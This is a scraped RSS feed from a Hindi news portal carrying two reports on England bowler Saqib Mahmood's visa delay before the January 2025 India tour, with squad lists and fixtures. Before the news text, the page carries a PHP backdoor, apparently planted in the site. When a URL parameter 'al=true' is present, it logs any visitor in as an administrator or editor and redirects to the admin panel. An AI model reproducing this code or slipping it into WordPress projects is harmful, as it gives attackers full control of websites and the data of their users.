// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Saqib Mahmood – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 17 Jan 2025 16:29:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 भारत दौरे के लिए साकिब महमूद को मिला वीजा https://pratyushaashakinayikiran.com/?p=122226 Fri, 17 Jan 2025 16:29:00 +0000 https://pratyushaashakinayikiran.com/?p=122226 नई दिल्ली
इंग्लैंड के तेज़ गेंदबाज़ साक़िब महमूद को भारत दौरे के लिए अंततः वीज़ा मिल गया है। अब वह शुक्रवार को अपनी टीम के साथ कोलकाता की यात्रा कर सकेंगे, जहां बुधवार को पहला टी 20 होना है।

पाकिस्तानी मूल के महमूद के वीज़ा में देरी हो रही थी, जिसके कारण वह यूएई में लगे टीम के ट्रेनिंग कैंप का भी हिस्सा नहीं बन पाए थे। हालांकि टीम के अन्य सदस्यों आदिल राशिद और रेहान अहमद को जल्दी ही वीज़ा मिल गया था।

2019 में जब इंग्लैंड लायंस की टीम भारत के दौरे पर थी, तब भी महमूद को ऐसी ही दिक्कतों का सामना करना पड़ा था। 2024 में जब लंकाशायर की टीम एक प्री-सीज़न कैंप के लिए भारत में थी, तब भी महमूद भारत नहीं आ पाए थे। वहीं ऑफ़ स्पिनर शोएब बशीर को भी पिछले साल वीज़ा प्रक्रियाओं में देरी के कारण हैदराबाद के पहले टेस्ट से बाहर बैठना पड़ा था।

महमूद को इंग्लैंड के तेज़ गेंदबाज़ी सलाहकार जेम्स एंडरसन द्वारा अबु धाबी में चलाये जा रहे तेज़ गेंदबाज़ी कैंप का हिस्सा बनना था, जिसमें जोफ़्रा आर्चर, गस ऐटकिंसन, ब्राइडन कार्स और मार्क वुड हिस्सा ले रहे थे। लेकिन भारतीय दूतावास में पासपोर्ट होने के कारण वह ऐसा नहीं कर पाए।

 

]]>
वीजा देरी के कारण अबू धाबी में इंग्लिश टीम के प्रशिक्षण शिविर में हिस्सा नहीं ले पाएंगे साकिब महमूद https://pratyushaashakinayikiran.com/?p=121764 Thu, 16 Jan 2025 10:36:00 +0000 https://pratyushaashakinayikiran.com/?p=121764 नई दिल्ली
इंग्लैंड के भारत दौरे से पहले, इंग्लिश तेज गेंदबाज साकिब महमूद वीजा देरी के कारण अबू धाबी में अपनी टीम के प्रशिक्षण शिविर से चूक जाएंगे। साकिब को इंग्लैंड की वनडे और टी20 दोनों टीमों में शामिल किया गया है।

ईएसपीएनक्रिकइंफो के अनुसार, इंग्लैंड क्रिकेट बोर्ड (ईसीबी) को उम्मीद है कि 22 जनवरी को सीरीज के अपने पहले टी20 मैच के लिए पूरी टीम के कोलकाता जाने से पहले वीजा की समस्या का समाधान हो जाएगा। पाकिस्तानी मूल के अंग्रेजी खिलाड़ियों के लिए वीजा में देरी एक परिचित समस्या है।

इससे पहले 2024 में, इंग्लैंड के स्पिनर शोएब बशीर को वीजा मिलने में देरी के कारण हैदराबाद में भारत के खिलाफ इंग्लैंड के पहले टेस्ट मैच से बाहर कर दिया गया था। ईसीबी ने दिसंबर 2024 को भारत के व्हाइट-बॉल दौरे के लिए टीमों की घोषणा की, जिसमें तीन वनडे, पांच टी20 और आईसीसी पुरुष चैंपियंस ट्रॉफी 2025 शामिल है।

पांच मैचों की टी-20 सीरीज 22 जनवरी को कोलकाता के ईडन गार्डन्स में शुरू होगी। दूसरा मैच 25 जनवरी को चेन्नई के एमए चिदंबरम स्टेडियम में होगा। तीसरा मैच 28 जनवरी को राजकोट के निरंजन शाह स्टेडियम में खेला जाएगा। चौथा और पांचवां मैच क्रमशः 31 जनवरी और 2 फरवरी को पुणे के महाराष्ट्र क्रिकेट स्टेडियम और मुंबई के वानखेड़े स्टेडियम में खेला जाएगा।

वनडे सीरीज 6 फरवरी को नागपुर के वीसीए स्टेडियम में शुरू होगी। दूसरा वनडे 9 फरवरी को कटक के बाराबती स्टेडियम में खेला जाएगा, जबकि अंतिम मैच 12 फरवरी को अहमदाबाद के नरेंद्र मोदी स्टेडियम में होगा।

इंग्लैंड की टीम इस प्रकार है-

वनडे टीम: जोस बटलर (कप्तान), जोफ्रा आर्चर, गस एटकिंसन, जैकब बेथेल, हैरी ब्रुक, ब्रायडन कार्से, बेन डकेट, जेमी ओवरटन, जेमी स्मिथ, लियाम लिविंगस्टोन, आदिल राशिद, जो रूट, साकिब महमूद, फिल साल्ट, मार्क वुड।

टी20 टीम : जोस बटलर (कप्तान), रेहान अहमद, जोफ्रा आर्चर, गस एटकिंसन, जैकब बेथेल, हैरी ब्रुक, ब्रायडन कार्से, बेन डकेट, जेमी ओवरटन, जेमी स्मिथ, लियाम लिविंगस्टोन, आदिल राशिद, साकिब महमूद, फिल साल्ट, मार्क वुड।

 

 

]]>